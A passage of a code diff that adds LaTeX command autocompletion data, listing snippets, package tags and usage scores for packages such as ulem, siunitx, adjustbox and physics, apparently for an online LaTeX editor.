'\\color[$1]{$2}', + meta: 'todonotes-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'todonotes-cmd', + score: 0.2864294797053033, + }, + ], + ulem: [ + { + caption: '\\sout{}', + snippet: '\\sout{$1}', + meta: 'ulem-cmd', + score: 0.0010443313503631364, + }, + { + caption: '\\sout', + snippet: '\\sout', + meta: 'ulem-cmd', + score: 0.0010443313503631364, + }, + { + caption: '\\MakeRobust', + snippet: '\\MakeRobust', + meta: 'ulem-cmd', + score: 3.140504277052775e-5, + }, + { + caption: '\\hss', + snippet: '\\hss', + meta: 'ulem-cmd', + score: 0.0020627882815078768, + }, + { + caption: '\\uline{}', + snippet: '\\uline{$1}', + meta: 'ulem-cmd', + score: 0.005956273219192909, + }, + { + caption: '\\uline', + snippet: '\\uline', + meta: 'ulem-cmd', + score: 0.005956273219192909, + }, + { + caption: '\\markoverwith{}', + snippet: '\\markoverwith{$1}', + meta: 'ulem-cmd', + score: 0.0004888431085285657, + }, + { + caption: '\\iff', + snippet: '\\iff', + meta: 'ulem-cmd', + score: 0.004209937150980285, + }, + { + caption: '\\hfill', + snippet: '\\hfill', + meta: 'ulem-cmd', + score: 0.2058248088519886, + }, + { + caption: '\\ULon', + snippet: '\\ULon', + meta: 'ulem-cmd', + score: 0.0004888431085285657, + }, + { + caption: '\\normalem', + snippet: '\\normalem', + meta: 'ulem-cmd', + score: 0.00015564484081028078, + }, + { + caption: '\\useunder{}{}{}', + snippet: '\\useunder{$1}{$2}{$3}', + meta: 'ulem-cmd', + score: 0.0013185833851097916, + }, + { + caption: '\\hfil', + snippet: '\\hfil', + meta: 'ulem-cmd', + score: 0.006880789969115855, + }, + { + caption: '\\sout{}', + snippet: '\\sout{$1}', + meta: 'ulem-cmd', + score: 0.0010443313503631364, + }, + { + caption: '\\sout', + snippet: '\\sout', + meta: 'ulem-cmd', + score: 0.0010443313503631364, + }, + { + caption: '\\MakeRobust', + snippet: '\\MakeRobust', + meta: 'ulem-cmd', + score: 3.140504277052775e-5, + }, + { + caption: '\\hss', + snippet: '\\hss', + meta: 'ulem-cmd', + score: 0.0020627882815078768, + }, + { + caption: '\\uline{}', + snippet: '\\uline{$1}', + meta: 'ulem-cmd', + score: 0.005956273219192909, + }, + { + caption: '\\uline', + snippet: '\\uline', + meta: 'ulem-cmd', + score: 0.005956273219192909, + }, + { + caption: '\\markoverwith{}', + snippet: '\\markoverwith{$1}', + meta: 'ulem-cmd', + score: 0.0004888431085285657, + }, + { + caption: '\\iff', + snippet: '\\iff', + meta: 'ulem-cmd', + score: 0.004209937150980285, + }, + { + caption: '\\hfill', + snippet: '\\hfill', + meta: 'ulem-cmd', + score: 0.2058248088519886, + }, + { + caption: '\\ULon', + snippet: '\\ULon', + meta: 'ulem-cmd', + score: 0.0004888431085285657, + }, + { + caption: '\\normalem', + snippet: '\\normalem', + meta: 'ulem-cmd', + score: 0.00015564484081028078, + }, + { + caption: '\\useunder{}{}{}', + snippet: '\\useunder{$1}{$2}{$3}', + meta: 'ulem-cmd', + score: 0.0013185833851097916, + }, + { + caption: '\\hfil', + snippet: '\\hfil', + meta: 'ulem-cmd', + score: 0.006880789969115855, + }, + ], + gensymb: [ + { + caption: '\\degree', + snippet: '\\degree', + meta: 'gensymb-cmd', + score: 0.044752043138360405, + }, + { + caption: '\\ohm', + snippet: '\\ohm', + meta: 'gensymb-cmd', + score: 0.0038146685721293138, + }, + { + caption: '\\micro', + snippet: '\\micro', + meta: 'gensymb-cmd', + score: 0.011051971930487929, + }, + { + caption: '\\celsius', + snippet: '\\celsius', + meta: 'gensymb-cmd', + score: 0.0010806983851157788, + }, + ], + siunitx: [ + { + caption: '\\DeclareSIUnit{}{}', + snippet: '\\DeclareSIUnit{$1}{$2}', + meta: 'siunitx-cmd', + score: 0.00017911905960739648, + }, + { + caption: '\\DeclareSIUnit', + snippet: '\\DeclareSIUnit', + meta: 'siunitx-cmd', + score: 0.00017911905960739648, + }, + { + caption: '\\si{}', + snippet: '\\si{$1}', + meta: 'siunitx-cmd', + score: 0.015042996547458706, + }, + { + caption: '\\num{}', + snippet: '\\num{$1}', + meta: 'siunitx-cmd', + score: 0.0005077454796577224, + }, + { + caption: '\\num[]{}', + snippet: '\\num[$1]{$2}', + meta: 'siunitx-cmd', + score: 0.0005077454796577224, + }, + { + caption: '\\ang{}', + snippet: '\\ang{$1}', + meta: 'siunitx-cmd', + score: 0.00026216419341458844, + }, + { + caption: '\\SIrange{}{}{}', + snippet: '\\SIrange{$1}{$2}{$3}', + meta: 'siunitx-cmd', + score: 0.0004920776847142836, + }, + { + caption: '\\SIrange[]{}{}{}', + snippet: '\\SIrange[$1]{$2}{$3}{$4}', + meta: 'siunitx-cmd', + score: 0.0004920776847142836, + }, + { + caption: '\\SIlist{}{}', + snippet: '\\SIlist{$1}{$2}', + meta: 'siunitx-cmd', + score: 2.5005836362206937e-5, + }, + { + caption: '\\SI{}{}', + snippet: '\\SI{$1}{$2}', + meta: 'siunitx-cmd', + score: 0.04233098901537305, + }, + { + caption: '\\sisetup{}', + snippet: '\\sisetup{$1}', + meta: 'siunitx-cmd', + score: 0.0011875061630332172, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'siunitx-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\frenchspacing', + snippet: '\\frenchspacing', + meta: 'siunitx-cmd', + score: 0.0063276692758974925, + }, + { + caption: '\\endtabular', + snippet: '\\endtabular', + meta: 'siunitx-cmd', + score: 0.0005078239917067089, + }, + { + caption: '\\multicolumn{}{}{}', + snippet: '\\multicolumn{$1}{$2}{$3}', + meta: 'siunitx-cmd', + score: 0.5473606021405326, + }, + { + caption: '\\array{}', + snippet: '\\array{$1}', + meta: 'siunitx-cmd', + score: 2.650484574842396e-5, + }, + { + caption: '\\arraybackslash', + snippet: '\\arraybackslash', + meta: 'siunitx-cmd', + score: 0.014532521139459619, + }, + { + caption: '\\tabular{}', + snippet: '\\tabular{$1}', + meta: 'siunitx-cmd', + score: 0.0005078239917067089, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'siunitx-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\newcolumntype{}[]{}', + snippet: '\\newcolumntype{$1}[$2]{$3}', + meta: 'siunitx-cmd', + score: 0.018615449342361392, + }, + { + caption: '\\newcolumntype{}{}', + snippet: '\\newcolumntype{$1}{$2}', + meta: 'siunitx-cmd', + score: 0.018615449342361392, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'siunitx-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'siunitx-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\text{}', + snippet: '\\text{$1}', + meta: 'siunitx-cmd', + score: 0.3608680734736821, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'siunitx-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'siunitx-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'siunitx-cmd', + score: 0.2864294797053033, + }, + ], + adjustbox: [ + { + caption: '\\setlength{}{}', + snippet: '\\setlength{$1}{$2}', + meta: 'adjustbox-cmd', + score: 0.354445763583904, + }, + { + caption: '\\setlength', + snippet: '\\setlength', + meta: 'adjustbox-cmd', + score: 0.354445763583904, + }, + { + caption: '\\adjustbox{}{}', + snippet: '\\adjustbox{$1}{$2}', + meta: 'adjustbox-cmd', + score: 0.002008185536556013, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'adjustbox-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'adjustbox-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'adjustbox-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'adjustbox-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'adjustbox-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'adjustbox-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'adjustbox-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'adjustbox-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'adjustbox-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'adjustbox-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'adjustbox-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'adjustbox-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'adjustbox-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'adjustbox-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'adjustbox-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'adjustbox-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'adjustbox-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'adjustbox-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'adjustbox-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'adjustbox-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'adjustbox-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'adjustbox-cmd', + score: 0.004649150613625593, + }, + ], + moderncvcompatibility: [ + { + caption: '\\cvitem{}{}', + snippet: '\\cvitem{$1}{$2}', + meta: 'moderncvcompatibility-cmd', + score: 0.19605476980016281, + }, + { + caption: '\\cvlanguage{}{}{}', + snippet: '\\cvlanguage{$1}{$2}{$3}', + meta: 'moderncvcompatibility-cmd', + score: 0.00832363305853651, + }, + { + caption: '\\moderncvtheme[]{}', + snippet: '\\moderncvtheme[$1]{$2}', + meta: 'moderncvcompatibility-cmd', + score: 0.002355125248305291, + }, + { + caption: '\\moderncvtheme{}', + snippet: '\\moderncvtheme{$1}', + meta: 'moderncvcompatibility-cmd', + score: 0.002355125248305291, + }, + { + caption: '\\maketitle', + snippet: '\\maketitle', + meta: 'moderncvcompatibility-cmd', + score: 0.7504160124360846, + }, + { + caption: '\\phone[]{}', + snippet: '\\phone[$1]{$2}', + meta: 'moderncvcompatibility-cmd', + score: 0.09602264063533228, + }, + { + caption: '\\moderncvstyle{}', + snippet: '\\moderncvstyle{$1}', + meta: 'moderncvcompatibility-cmd', + score: 0.09378844125415692, + }, + { + caption: '\\firstname{}', + snippet: '\\firstname{$1}', + meta: 'moderncvcompatibility-cmd', + score: 0.0070031590875754435, + }, + { + caption: '\\cvline{}{}', + snippet: '\\cvline{$1}{$2}', + meta: 'moderncvcompatibility-cmd', + score: 0.007378490468121007, + }, + { + caption: '\\mobile{}', + snippet: '\\mobile{$1}', + meta: 'moderncvcompatibility-cmd', + score: 0.022907406369946367, + }, + { + caption: '\\familyname{}', + snippet: '\\familyname{$1}', + meta: 'moderncvcompatibility-cmd', + score: 0.0070031590875754435, + }, + { + caption: '\\section{}', + snippet: '\\section{$1}', + meta: 'moderncvcompatibility-cmd', + score: 3.0952612541683835, + }, + ], + helvet: [ + { + caption: '\\sfdefault', + snippet: '\\sfdefault', + meta: 'helvet-cmd', + score: 0.008427383388519996, + }, + { + caption: '\\sfdefault{}', + snippet: '\\sfdefault{$1}', + meta: 'helvet-cmd', + score: 0.008427383388519996, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'helvet-cmd', + score: 0.00037306820619479756, + }, + ], + placeins: [ + { + caption: '\\FloatBarrier', + snippet: '\\FloatBarrier', + meta: 'placeins-cmd', + score: 0.015841933780270347, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'placeins-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'placeins-cmd', + score: 0.021170869458413965, + }, + ], + colortbl: [ + { + caption: '\\rowcolor{}', + snippet: '\\rowcolor{$1}', + meta: 'colortbl-cmd', + score: 0.05564476491638024, + }, + { + caption: '\\rowcolor[]{}', + snippet: '\\rowcolor[$1]{$2}', + meta: 'colortbl-cmd', + score: 0.05564476491638024, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'colortbl-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'colortbl-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\arrayrulecolor{}', + snippet: '\\arrayrulecolor{$1}', + meta: 'colortbl-cmd', + score: 0.008538501902241319, + }, + { + caption: '\\arrayrulecolor[]{}', + snippet: '\\arrayrulecolor[$1]{$2}', + meta: 'colortbl-cmd', + score: 0.008538501902241319, + }, + { + caption: '\\hline', + snippet: '\\hline', + meta: 'colortbl-cmd', + score: 1.3209538327406387, + }, + { + caption: '\\multicolumn{}{}{}', + snippet: '\\multicolumn{$1}{$2}{$3}', + meta: 'colortbl-cmd', + score: 0.5473606021405326, + }, + { + caption: '\\cellcolor[]{}', + snippet: '\\cellcolor[$1]{$2}', + meta: 'colortbl-cmd', + score: 0.11068275858524645, + }, + { + caption: '\\cellcolor{}', + snippet: '\\cellcolor{$1}', + meta: 'colortbl-cmd', + score: 0.11068275858524645, + }, + { + caption: '\\endtabular', + snippet: '\\endtabular', + meta: 'colortbl-cmd', + score: 0.0005078239917067089, + }, + { + caption: '\\multicolumn{}{}{}', + snippet: '\\multicolumn{$1}{$2}{$3}', + meta: 'colortbl-cmd', + score: 0.5473606021405326, + }, + { + caption: '\\array{}', + snippet: '\\array{$1}', + meta: 'colortbl-cmd', + score: 2.650484574842396e-5, + }, + { + caption: '\\arraybackslash', + snippet: '\\arraybackslash', + meta: 'colortbl-cmd', + score: 0.014532521139459619, + }, + { + caption: '\\tabular{}', + snippet: '\\tabular{$1}', + meta: 'colortbl-cmd', + score: 0.0005078239917067089, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'colortbl-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\newcolumntype{}[]{}', + snippet: '\\newcolumntype{$1}[$2]{$3}', + meta: 'colortbl-cmd', + score: 0.018615449342361392, + }, + { + caption: '\\newcolumntype{}{}', + snippet: '\\newcolumntype{$1}{$2}', + meta: 'colortbl-cmd', + score: 0.018615449342361392, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'colortbl-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'colortbl-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'colortbl-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'colortbl-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'colortbl-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'colortbl-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'colortbl-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'colortbl-cmd', + score: 0.2864294797053033, + }, + ], + appendix: [ + { + caption: '\\appendixpagename', + snippet: '\\appendixpagename', + meta: 'appendix-cmd', + score: 0.0005082989114039268, + }, + { + caption: '\\appendixpagename{}', + snippet: '\\appendixpagename{$1}', + meta: 'appendix-cmd', + score: 0.0005082989114039268, + }, + { + caption: '\\thechapter', + snippet: '\\thechapter', + meta: 'appendix-cmd', + score: 0.011821300392639589, + }, + { + caption: '\\sectionmark', + snippet: '\\sectionmark', + meta: 'appendix-cmd', + score: 0.005008938879210868, + }, + { + caption: '\\thesubsection', + snippet: '\\thesubsection', + meta: 'appendix-cmd', + score: 0.004364729212023423, + }, + { + caption: '\\appendixname', + snippet: '\\appendixname', + meta: 'appendix-cmd', + score: 0.006491295958752496, + }, + { + caption: '\\appendixname{}', + snippet: '\\appendixname{$1}', + meta: 'appendix-cmd', + score: 0.006491295958752496, + }, + { + caption: '\\addcontentsline{}{}{}', + snippet: '\\addcontentsline{$1}{$2}{$3}', + meta: 'appendix-cmd', + score: 0.07503475348393239, + }, + { + caption: '\\thesection', + snippet: '\\thesection', + meta: 'appendix-cmd', + score: 0.011068945893347528, + }, + { + caption: '\\thesection{}', + snippet: '\\thesection{$1}', + meta: 'appendix-cmd', + score: 0.011068945893347528, + }, + { + caption: '\\appendixpage', + snippet: '\\appendixpage', + meta: 'appendix-cmd', + score: 0.0003193786370376004, + }, + { + caption: '\\appendixpage{}', + snippet: '\\appendixpage{$1}', + meta: 'appendix-cmd', + score: 0.0003193786370376004, + }, + { + caption: '\\appendixtocname', + snippet: '\\appendixtocname', + meta: 'appendix-cmd', + score: 0.0005082989114039268, + }, + { + caption: '\\appendixtocname{}', + snippet: '\\appendixtocname{$1}', + meta: 'appendix-cmd', + score: 0.0005082989114039268, + }, + { + caption: '\\phantomsection', + snippet: '\\phantomsection', + meta: 'appendix-cmd', + score: 0.0174633138331273, + }, + ], + supertabular: [ + { + caption: '\\tabletail{}', + snippet: '\\tabletail{$1}', + meta: 'supertabular-cmd', + score: 0.00284734590996941, + }, + { + caption: '\\tablehead{}', + snippet: '\\tablehead{$1}', + meta: 'supertabular-cmd', + score: 0.002940437317353234, + }, + { + caption: '\\tablelasttail{}', + snippet: '\\tablelasttail{$1}', + meta: 'supertabular-cmd', + score: 0.00284734590996941, + }, + { + caption: '\\tablefirsthead{}', + snippet: '\\tablefirsthead{$1}', + meta: 'supertabular-cmd', + score: 0.00284734590996941, + }, + ], + makeidx: [ + { + caption: '\\printindex', + snippet: '\\printindex', + meta: 'makeidx-cmd', + score: 0.004417016910870522, + }, + ], + framed: [ + { + caption: '\\fbox{}', + snippet: '\\fbox{$1}', + meta: 'framed-cmd', + score: 0.020865450075016792, + }, + ], + layaureo: [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'layaureo-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'layaureo-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\setlength{}{}', + snippet: '\\setlength{$1}{$2}', + meta: 'layaureo-cmd', + score: 0.354445763583904, + }, + { + caption: '\\setlength', + snippet: '\\setlength', + meta: 'layaureo-cmd', + score: 0.354445763583904, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'layaureo-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'layaureo-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'layaureo-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\setcounter{}{}', + snippet: '\\setcounter{$1}{$2}', + meta: 'layaureo-cmd', + score: 0.10068045662118841, + }, + { + caption: '\\addtolength{}{}', + snippet: '\\addtolength{$1}{$2}', + meta: 'layaureo-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\addtolength', + snippet: '\\addtolength', + meta: 'layaureo-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\savegeometry{}', + snippet: '\\savegeometry{$1}', + meta: 'layaureo-cmd', + score: 6.461638865465447e-5, + }, + { + caption: '\\loadgeometry{}', + snippet: '\\loadgeometry{$1}', + meta: 'layaureo-cmd', + score: 6.461638865465447e-5, + }, + { + caption: '\\newgeometry{}', + snippet: '\\newgeometry{$1}', + meta: 'layaureo-cmd', + score: 0.0025977479207639352, + }, + { + caption: '\\geometry{}', + snippet: '\\geometry{$1}', + meta: 'layaureo-cmd', + score: 0.046218420429973615, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'layaureo-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\restoregeometry', + snippet: '\\restoregeometry', + meta: 'layaureo-cmd', + score: 0.0007546303842143648, + }, + { + caption: '\\RequireXeTeX', + snippet: '\\RequireXeTeX', + meta: 'layaureo-cmd', + score: 0.00021116765384691477, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'layaureo-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'layaureo-cmd', + score: 0.002958865219480927, + }, + ], + keyval: [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'keyval-cmd', + score: 0.00037306820619479756, + }, + ], + physics: [ + { + caption: '\\sinh', + snippet: '\\sinh', + meta: 'physics-cmd', + score: 0.0006435164702005918, + }, + { + caption: '\\sinh{}', + snippet: '\\sinh{$1}', + meta: 'physics-cmd', + score: 0.0006435164702005918, + }, + { + caption: '\\curl{}', + snippet: '\\curl{$1}', + meta: 'physics-cmd', + score: 0.001039136354388696, + }, + { + caption: '\\curl', + snippet: '\\curl', + meta: 'physics-cmd', + score: 0.001039136354388696, + }, + { + caption: '\\dd', + snippet: '\\dd', + meta: 'physics-cmd', + score: 0.0049652819784537965, + }, + { + caption: '\\expval{}', + snippet: '\\expval{$1}', + meta: 'physics-cmd', + score: 0.0006729185293892782, + }, + { + caption: '\\exp', + snippet: '\\exp', + meta: 'physics-cmd', + score: 0.02404262443651467, + }, + { + caption: '\\exp{}', + snippet: '\\exp{$1}', + meta: 'physics-cmd', + score: 0.02404262443651467, + }, + { + caption: '\\mqty', + snippet: '\\mqty', + meta: 'physics-cmd', + score: 0.0002048562866401335, + }, + { + caption: '\\order{}', + snippet: '\\order{$1}', + meta: 'physics-cmd', + score: 0.00019980403788140113, + }, + { + caption: '\\order', + snippet: '\\order', + meta: 'physics-cmd', + score: 0.00019980403788140113, + }, + { + caption: '\\abs{}', + snippet: '\\abs{$1}', + meta: 'physics-cmd', + score: 0.016268920166928613, + }, + { + caption: '\\cos', + snippet: '\\cos', + meta: 'physics-cmd', + score: 0.050370402546134785, + }, + { + caption: '\\cos{}', + snippet: '\\cos{$1}', + meta: 'physics-cmd', + score: 0.050370402546134785, + }, + { + caption: '\\dv{}{}', + snippet: '\\dv{$1}{$2}', + meta: 'physics-cmd', + score: 0.005139463745615663, + }, + { + caption: '\\dv[]{}{}', + snippet: '\\dv[$1]{$2}{$3}', + meta: 'physics-cmd', + score: 0.005139463745615663, + }, + { + caption: '\\eval{}', + snippet: '\\eval{$1}', + meta: 'physics-cmd', + score: 0.00021313621676565867, + }, + { + caption: '\\eval', + snippet: '\\eval', + meta: 'physics-cmd', + score: 0.00021313621676565867, + }, + { + caption: '\\eval[]{}', + snippet: '\\eval[$1]{$2}', + meta: 'physics-cmd', + score: 0.00021313621676565867, + }, + { + caption: '\\tan', + snippet: '\\tan', + meta: 'physics-cmd', + score: 0.006176447465423192, + }, + { + caption: '\\det', + snippet: '\\det', + meta: 'physics-cmd', + score: 0.005640718203101287, + }, + { + caption: '\\ket{}', + snippet: '\\ket{$1}', + meta: 'physics-cmd', + score: 0.0326276280979336, + }, + { + caption: '\\mel{}{}{}', + snippet: '\\mel{$1}{$2}{$3}', + meta: 'physics-cmd', + score: 0.001123156900573353, + }, + { + caption: '\\ip', + snippet: '\\ip', + meta: 'physics-cmd', + score: 0.0008534664860896849, + }, + { + caption: '\\ip{}{}', + snippet: '\\ip{$1}{$2}', + meta: 'physics-cmd', + score: 0.0008534664860896849, + }, + { + caption: '\\ip[]{}', + snippet: '\\ip[$1]{$2}', + meta: 'physics-cmd', + score: 0.0008534664860896849, + }, + { + caption: '\\Im', + snippet: '\\Im', + meta: 'physics-cmd', + score: 0.0013451768070134808, + }, + { + caption: '\\Im{}', + snippet: '\\Im{$1}', + meta: 'physics-cmd', + score: 0.0013451768070134808, + }, + { + caption: '\\cosh', + snippet: '\\cosh', + meta: 'physics-cmd', + score: 0.0008896391580266903, + }, + { + caption: '\\cosh{}', + snippet: '\\cosh{$1}', + meta: 'physics-cmd', + score: 0.0008896391580266903, + }, + { + caption: '\\comm{}{}', + snippet: '\\comm{$1}{$2}', + meta: 'physics-cmd', + score: 0.0012026610554672049, + }, + { + caption: '\\qty', + snippet: '\\qty', + meta: 'physics-cmd', + score: 0.0017737618641299655, + }, + { + caption: '\\qty{}', + snippet: '\\qty{$1}', + meta: 'physics-cmd', + score: 0.0017737618641299655, + }, + { + caption: '\\Tr', + snippet: '\\Tr', + meta: 'physics-cmd', + score: 0.004615158124783136, + }, + { + caption: '\\Tr{}', + snippet: '\\Tr{$1}', + meta: 'physics-cmd', + score: 0.004615158124783136, + }, + { + caption: '\\bra{}', + snippet: '\\bra{$1}', + meta: 'physics-cmd', + score: 0.005609763332417241, + }, + { + caption: '\\poissonbracket{}{}', + snippet: '\\poissonbracket{$1}{$2}', + meta: 'physics-cmd', + score: 2.2761809626681494e-5, + }, + { + caption: '\\pmat{}', + snippet: '\\pmat{$1}', + meta: 'physics-cmd', + score: 0.00010356789132354732, + }, + { + caption: '\\norm{}', + snippet: '\\norm{$1}', + meta: 'physics-cmd', + score: 0.006576610603906938, + }, + { + caption: '\\cot', + snippet: '\\cot', + meta: 'physics-cmd', + score: 0.0003640644365701238, + }, + { + caption: '\\cot{}', + snippet: '\\cot{$1}', + meta: 'physics-cmd', + score: 0.0003640644365701238, + }, + { + caption: '\\cross', + snippet: '\\cross', + meta: 'physics-cmd', + score: 0.0005412940211650938, + }, + { + caption: '\\log', + snippet: '\\log', + meta: 'physics-cmd', + score: 0.048131780413380156, + }, + { + caption: '\\dmat{}', + snippet: '\\dmat{$1}', + meta: 'physics-cmd', + score: 2.2761809626681494e-5, + }, + { + caption: '\\Re', + snippet: '\\Re', + meta: 'physics-cmd', + score: 0.0031525922563281736, + }, + { + caption: '\\Re{}', + snippet: '\\Re{$1}', + meta: 'physics-cmd', + score: 0.0031525922563281736, + }, + { + caption: '\\qq{}', + snippet: '\\qq{$1}', + meta: 'physics-cmd', + score: 8.241282620919185e-5, + }, + { + caption: '\\qq', + snippet: '\\qq', + meta: 'physics-cmd', + score: 8.241282620919185e-5, + }, + { + caption: '\\vb{}', + snippet: '\\vb{$1}', + meta: 'physics-cmd', + score: 0.007377410801695042, + }, + { + caption: '\\pdv{}{}', + snippet: '\\pdv{$1}{$2}', + meta: 'physics-cmd', + score: 0.0014087913646471247, + }, + { + caption: '\\pdv{}{}{}', + snippet: '\\pdv{$1}{$2}{$3}', + meta: 'physics-cmd', + score: 0.0014087913646471247, + }, + { + caption: '\\braket{}{}', + snippet: '\\braket{$1}{$2}', + meta: 'physics-cmd', + score: 0.004421747491186916, + }, + { + caption: '\\braket{}', + snippet: '\\braket{$1}', + meta: 'physics-cmd', + score: 0.004421747491186916, + }, + { + caption: '\\div', + snippet: '\\div', + meta: 'physics-cmd', + score: 0.002403050103349905, + }, + { + caption: '\\div{}', + snippet: '\\div{$1}', + meta: 'physics-cmd', + score: 0.002403050103349905, + }, + { + caption: '\\sin', + snippet: '\\sin', + meta: 'physics-cmd', + score: 0.040463088537699636, + }, + { + caption: '\\sin{}', + snippet: '\\sin{$1}', + meta: 'physics-cmd', + score: 0.040463088537699636, + }, + { + caption: '\\pmb{}', + snippet: '\\pmb{$1}', + meta: 'physics-cmd', + score: 0.019171182556792562, + }, + { + caption: '\\boldsymbol{}', + snippet: '\\boldsymbol{$1}', + meta: 'physics-cmd', + score: 0.18137737738638837, + }, + { + caption: '\\boldsymbol', + snippet: '\\boldsymbol', + meta: 'physics-cmd', + score: 0.18137737738638837, + }, + { + caption: '\\longmapsto', + snippet: '\\longmapsto', + meta: 'physics-cmd', + score: 0.0017755897148012264, + }, + { + caption: '\\Check{}', + snippet: '\\Check{$1}', + meta: 'physics-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\numberwithin{}{}', + snippet: '\\numberwithin{$1}{$2}', + meta: 'physics-cmd', + score: 0.006963729684667191, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'physics-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\iff', + snippet: '\\iff', + meta: 'physics-cmd', + score: 0.004209937150980285, + }, + { + caption: '\\And', + snippet: '\\And', + meta: 'physics-cmd', + score: 0.0011582952152188854, + }, + { + caption: '\\And{}', + snippet: '\\And{$1}', + meta: 'physics-cmd', + score: 